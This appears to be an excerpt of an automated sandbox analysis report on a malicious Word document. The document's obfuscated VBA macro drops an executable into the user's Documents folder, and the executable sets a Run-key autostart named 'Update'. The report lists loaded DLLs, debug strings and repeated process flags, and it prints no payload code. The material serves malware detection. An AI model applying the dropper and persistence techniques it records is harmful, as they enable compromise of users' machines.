    Source: C:\Users\user\Documents\example.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
    Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Csp/Release/net8.0-windows/System.Security.Cryptography.Csp.pdbSHA256 source: example.exe, 0000000C.00000002.3647342033.000001D6D44D0000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdbSHA256~\{^ source: example.exe, 0000000C.00000002.3644852440.000001963DA40000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdb source: example.exe, 0000000C.00000002.3648392319.000001D6D51E0000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdb source: example.exe, 0000000C.00000002.3647038849.000001D6D4390000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: bD:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: example.exe, 0000000C.00000002.3645897805.0000019641C02000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: aC:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdb source: example.exe, 0000000C.00000002.3645897805.0000019641C02000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Runtime.InteropServices.ni.pdb source: example.exe, 0000000C.00000002.3648255484.000001D6D5180000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648304673.000001D6D51A1000.00000020.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.StackTrace\Release\net8.0\System.Diagnostics.StackTrace.pdb source: example.exe, 0000000C.00000002.3644724065.000001963D9F0000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: example.exe, 0000000C.00000002.3648556809.000001D6D5201000.00000020.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3648674007.000001D6D5220000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Compression.ZipFile\Release\net8.0-windows\System.IO.Compression.ZipFile.pdb source: example.exe, 0000000C.00000002.3648814958.000001D6D5280000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Diagnostics.Process.ni.pdb source: example.exe, example.exe, 0000000C.00000002.3647199618.000001D6D4420000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3647262031.000001D6D4481000.00000020.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Private.CoreLib.pdb source: example.exe, 0000000C.00000002.3645897805.0000019641C02000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Csp/Release/net8.0-windows/System.Security.Cryptography.Csp.pdb source: example.exe, 0000000C.00000002.3647342033.000001D6D44D0000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.Lightweight\Release\net8.0\System.Reflection.Emit.Lightweight.pdb source: example.exe, 0000000C.00000002.3648371388.000001D6D51D0000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: example.exe, 0000000C.00000002.3645558187.000001963F311000.00000020.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3647010977.000001D6D4370000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdbSHA256 source: example.exe, 0000000C.00000002.3647038849.000001D6D4390000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: example.exe, 0000000C.00000000.3282635316.00007FF6090DD000.00000002.00000001.01000000.00000004.sdmp, example.exe.0.dr
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: example.exe, 0000000C.00000002.3647365341.000001D6D44E0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648900484.000001D6D5381000.00000020.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: example.exe, example.exe, 0000000C.00000002.3647061697.000001D6D43A0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3647121204.000001D6D43E1000.00000020.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdbSHA256 source: example.exe, 0000000C.00000002.3645137007.000001963DAD0000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: System.IO.Compression.ZipFile.ni.pdb source: example.exe, 0000000C.00000002.3648814958.000001D6D5280000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: HK.pdb source: example.exe, 0000000C.00000002.3644958189.000001963DA62000.00000020.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3645394042.000001963F290000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdbSHA256 source: example.exe, 0000000C.00000002.3648392319.000001D6D51E0000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: example.exe, 0000000C.00000002.3645558187.000001963F311000.00000020.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3647010977.000001D6D4370000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: example.exe, 0000000C.00000000.3283694459.00007FF6092B8000.00000002.00000001.01000000.00000004.sdmp, example.exe.0.dr
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.Lightweight\Release\net8.0\System.Reflection.Emit.Lightweight.pdbSHA256 source: example.exe, 0000000C.00000002.3648371388.000001D6D51D0000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Primitives/Release/net8.0-windows/System.Security.Cryptography.Primitives.pdbSHA256 source: example.exe, 0000000C.00000002.3645471398.000001963F300000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: System.Data.SQLite.pdb source: example.exe, 0000000C.00000002.3645897805.0000019641C02000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: example.exe, example.exe, 0000000C.00000002.3647199618.000001D6D4420000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3647262031.000001D6D4481000.00000020.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: example.exe, 0000000C.00000002.3644852440.000001963DA40000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: .C:\Users\user\Documents\System.Data.SQLite.pdbHS source: example.exe, 0000000C.00000002.3645897805.0000019641C02000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Threading.ni.pdb source: example.exe, 0000000C.00000002.3648556809.000001D6D5201000.00000020.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3648674007.000001D6D5220000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\Release\net8.0\System.Reflection.Primitives.pdb source: example.exe, 0000000C.00000002.3648414415.000001D6D51F0000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\Release\net8.0\System.Reflection.Primitives.pdbSHA256 source: example.exe, 0000000C.00000002.3648414415.000001D6D51F0000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: example.exe, 0000000C.00000002.3645137007.000001963DAD0000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: example.exe, 0000000C.00000002.3648255484.000001D6D5180000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648304673.000001D6D51A1000.00000020.00001000.00020000.00000000.sdmp
    Source: Binary string: 2C:\Users\user\Documents\System.Private.CoreLib.pdb source: example.exe, 0000000C.00000002.3645897805.0000019641C02000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Collections.ni.pdb source: example.exe, example.exe, 0000000C.00000002.3647061697.000001D6D43A0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3647121204.000001D6D43E1000.00000020.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Private.CoreLib.ni.pdb source: example.exe, 0000000C.00000002.3647365341.000001D6D44E0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648900484.000001D6D5381000.00000020.00001000.00020000.00000000.sdmp
    Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Primitives/Release/net8.0-windows/System.Security.Cryptography.Primitives.pdb source: example.exe, 0000000C.00000002.3645471398.000001963F300000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: System.Diagnostics.StackTrace.ni.pdb source: example.exe, 0000000C.00000002.3644724065.000001963D9F0000.00000004.10000000.00040000.00000000.sdmp

    Data Obfuscation

    barindex
    Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
    Source: q9JZUaS1Gy.docStream path 'Macros/VBA/Module3' : High number of GOTO operations
    Source: ~WRD0000.tmp.0.drStream path 'Macros/VBA/Module3' : High number of GOTO operations
    Source: example.exe.0.drStatic PE information: section name: .CLR_UEF
    Source: example.exe.0.drStatic PE information: section name: .didat
    Source: example.exe.0.drStatic PE information: section name: Section
    Source: example.exe.0.drStatic PE information: section name: _RDATA
    Source: C:\Users\user\Documents\example.exeCode function: 12_2_000001D6D43E23B2 push rdi; retf 12_2_000001D6D43E23B3
    Source: C:\Users\user\Documents\example.exeCode function: 12_2_000001D6D43E558A push rsp; retf 12_2_000001D6D43E558B
    Source: C:\Users\user\Documents\example.exeCode function: 12_2_000001D6D43E2372 push rax; retf 12_2_000001D6D43E2373
    Source: C:\Users\user\Documents\example.exeCode function: 12_2_000001D6D43E48F2 push rdx; iretd 12_2_000001D6D43E4905
    Source: C:\Users\user\Documents\example.exeCode function: 12_2_000001D6D4483A7E push rax; iretd 12_2_000001D6D4483A81

    Persistence and Installation Behavior

    barindex
    Drops PE files to the document folder of the user
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\Documents\example.exeJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\Documents\example.exeJump to dropped file

    Boot Survival

    barindex
    Creates an autostart registry key pointing to binary in C:\Windows
    Source: C:\Users\user\Documents\example.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UpdateJump to behavior
    Source: C:\Users\user\Documents\example.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UpdateJump to behavior
    Source: C:\Users\user\Documents\example.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UpdateJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
